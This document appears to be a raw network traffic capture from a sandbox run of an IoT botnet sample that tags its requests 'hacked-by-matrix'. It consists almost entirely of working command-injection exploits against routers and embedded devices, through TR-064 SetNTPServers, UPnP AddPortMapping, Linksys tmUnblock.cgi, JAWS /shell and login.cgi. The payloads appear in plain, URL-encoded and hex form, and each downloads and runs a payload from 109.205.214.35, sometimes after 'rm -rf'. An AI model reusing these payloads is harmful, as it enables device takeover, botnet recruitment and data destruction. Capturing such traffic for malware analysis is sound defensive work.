                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:45.311326981 CET240INHTTP/1.1 400 Bad Request
                                                        Content-Length: 0
                                                        Date: Thu, 21 Mar 2024 04:23:44 GMT
                                                        X-Frame-Options: sameorigin
                                                        Content-Security-Policy: frame-ancestors 'self'
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2071192.168.2.13469008.146.241.10552869
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.158263922 CET975OUTPOST /wanipcn.xml HTTP/1.1
                                                        Host: 127.0.0.1:52869
                                                        Content-Length: 630
                                                        Accept-Encoding: gzip, deflate
                                                        SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
                                                        Accept: */*
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
                                                        Connection: keep-alive
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6d 61 74 72 69 78 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 20 2d 4f 20 6d 61 74 72 69 78 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 61 74 72 69 78 3b 20 2e 2f 6d 61 74 72 69 78 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf matrix; wget http://109.205.214.35/matrixexp.sh -O matrix; chmod 777 matrix; ./matrix realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2072192.168.2.1357950213.251.185.15980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.229800940 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:45.394232035 CET321INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.21.4
                                                        Date: Thu, 21 Mar 2024 04:23:46 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 157
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 31 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.21.4</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2073192.168.2.135900899.241.252.2147547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.246839046 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2074192.168.2.1353410201.253.134.117547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.249753952 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2075192.168.2.1350052220.91.86.757547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.288286924 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2076192.168.2.1349164183.123.17.1607547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.292764902 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:45.586574078 CET97INHTTP/1.1 401 Unauthorized
                                                        Date: Thu, 21 Mar 2024 04:23:45 GMT
                                                        Content-length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2077192.168.2.133723238.109.254.817547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.304136992 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:45.461527109 CET240INHTTP/1.1 400 Bad Request
                                                        Content-Length: 0
                                                        Date: Thu, 21 Mar 2024 04:23:44 GMT
                                                        X-Frame-Options: sameorigin
                                                        Content-Security-Policy: frame-ancestors 'self'
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2078192.168.2.1339340172.65.175.755555
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.445621967 CET438OUTPOST /tmUnblock.cgi HTTP/1.1
                                                        Host: 127.0.0.1:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 74 74 63 70 5f 69 70 3d 2d 68 2b 25 36 30 63 64 2b 25 32 46 74 6d 70 25 33 42 2b 72 6d 2b 2d 72 66 2b 7a 65 6e 2e 6d 70 73 6c 25 33 42 2b 77 67 65 74 2b 68 74 74 70 25 33 41 25 32 46 25 32 46 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 25 32 46 6d 70 73 6c 25 33 42 2b 63 68 6d 6f 64 2b 37 37 37 2b 6d 70 73 6c 25 33 42 2b 2e 25 32 46 6d 70 73 6c 2b 6c 69 6e 6b 73 79 73 25 36 30 26 61 63 74 69 6f 6e 3d 26 74 74 63 70 5f 6e 75 6d 3d 32 26 74 74 63 70 5f 73 69 7a 65 3d 32 26 73 75 62 6d 69 74 5f 62 75 74 74 6f 6e 3d 26 63 68 61 6e 67 65 5f 61 63 74 69 6f 6e 3d 26 63 6f 6d 6d 69 74 3d 30 26 53 74 61 72 74 45 50 49 3d 31
                                                        Data Ascii: ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+zen.mpsl%3B+wget+http%3A%2F%2F109.205.214.35%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2079192.168.2.1353462201.253.134.117547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.504930973 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:46.832207918 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2080192.168.2.1340502104.200.137.15480
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.526886940 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:45.882668972 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:46.001013994 CET585INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:45 GMT
                                                        Server: Apache/2.4.58 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 PHP/5.5.38
                                                        Content-Length: 347
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2081192.168.2.1350104220.91.86.757547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.569921970 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2082192.168.2.1349216183.123.17.1607547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.573375940 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:
                                                        Mar 21, 2024 05:23:45.882560015 CET97INHTTP/1.1 401 Unauthorized
                                                        Date: Thu, 21 Mar 2024 04:23:45 GMT
                                                        Content-length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2083192.168.2.1359830152.254.159.2177547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.769763947 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2084192.168.2.133379418.245.211.12380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.967500925 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:46.831365108 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:47.008349895 CET927INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"><TITLE>ERROR: The request could not be satisfied</TITLE


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2085192.168.2.1349366148.251.236.17080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:45.978996992 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:46.154429913 CET499INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:46 GMT
                                                        Server: Apache/2.4.38 (Debian)
                                                        Content-Length: 305
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 69 6e 6d 61 72 73 6f 66 74 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.38 (Debian) Server at inmarsoft.com Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2086192.168.2.1347772172.65.89.368080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.021059036 CET122OUTPOST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://109.205.214.35/mpsl;chmod 777 *;./mpsl asus;sh mpsl asu
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2087192.168.2.135053834.98.71.5280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.243524075 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2088192.168.2.135269070.40.214.22780
                                                        TimestampBytes transferredDirectionData
